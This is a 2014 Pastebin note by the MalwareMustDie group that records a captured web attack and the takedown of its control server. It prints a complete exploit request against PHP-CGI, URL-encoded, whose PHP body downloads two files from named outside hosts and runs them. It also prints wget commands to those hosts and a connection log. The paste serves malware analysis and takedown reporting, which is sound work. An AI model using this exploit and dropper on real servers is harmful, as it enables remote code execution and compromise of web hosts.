daily pastebin goal
86%
SHARE
TWEET

I'm a mu mu mu? Just a Crap!

MalwareMustDie Jul 27th, 2014 434 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // #MalwareMustDie sCRAPnote
  2. // I'm a mu mu mu ? Is a lamer crap!
  3.  
  4. POST /cgi-bin/phpinfo.php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1
  5. Host: xxx.xxx.xxx.xxx
  6. User-Agent: I`m a mu mu mu ?
  7. Content-Type: application/x-www-form-urlencoded
  8. Content-Length: 502
  9. Connection: close
  10. <?php
  11. $tmp = sys_get_temp_dir();
  12. $path = getcwd();
  13. $file = "e.html";
  14. $url = "http://eleven11root.servepics.com";
  15. system("wget $url -P - -O" . $tmp . "/e.html");
  16. system("chmod -R 777" . $tmp ."/e.html");
  17. chmod ($tmp."/".$file,0777);
  18. system($tmp . "/e.html");
  19. $file2 = "t.htm";
  20. $url2 = "http://twelfe12root.servepics.com";
  21. system("wget $url2 -P - -O" . $tmp . "/t.htm");
  22. system("chmod -R 777" . $tmp ."/t.htm");
  23. chmod ($tmp."/".$file2,0777);
  24. system($tmp . "/t.htm");
  25. echo $tmp;
  26. echo $path;
  27. die($tmp);
  28.  
  29. / infected site dropped binaries /
  30. wget http://eleven11root.servepics.com -P - -O ./e.html
  31. wget http://twelfe12root.servepics.com -P - -O ./t.html
  32.  
  33. / header checks /
  34. --2014-07-25 12:48:57--  http://twelfe12root.servepics.com/
  35. Resolving twelfe12root.servepics.com... 8.23.224.90
  36. Caching twelfe12root.servepics.com => 8.23.224.90
  37. Connecting to twelfe12root.servepics.com|8.23.224.90|:80... connected.
  38. Created socket 4.
  39. Releasing 0x00007fc878404890 (new refcount 1).
  40. GET / HTTP/1.1
  41. User-Agent: MMDBangsMyget/1.14 (MalwareMustDie12.2.1)
  42. Accept: **
  43. Host: twelfe12root.servepics.com
  44. Connection: Keep-Alive
  45. HTTP request sent, awaiting response...
  46. HTTP/1.1 302 Found
  47. Date: Fri, 25 Jul 2014 03:48:58 GMT
  48. Server: Apache/2.2.3 (CentOS)
  49. X-Powered-By: PHP/5.1.6
  50. Location: http://127.0.0.1
  51. Content-Length: 0
  52. Connection: close
  53. Content-Type: text/html; charset=UTF-8
  54. 302 Found
  55. Location: http://127.0.0.1 [following]
  56. Closed fd 4
  57. Connecting to 127.0.0.1:80... Closed fd 4
  58. failed: Connection refused.
  59. Releasing 0x00007fc878403ed0 (new refcount 0).
  60. Deleting unused 0x00007fc878403ed0.
  61.  
  62. / Encryption analysis /
  63. %2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
  64.  
  65. / crack result /
  66. https://twitter.com/MalwareMustDie/status/492534140340682754
  67.  
  68. / status /
  69. CNC was knocked down, @MMD Tango Team
  70. different case, same incident: http://pastebin.com/VePW1zGP
  71.  
  72. #MalwareMustDie | cracked & reported by @unixfreaxjp
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top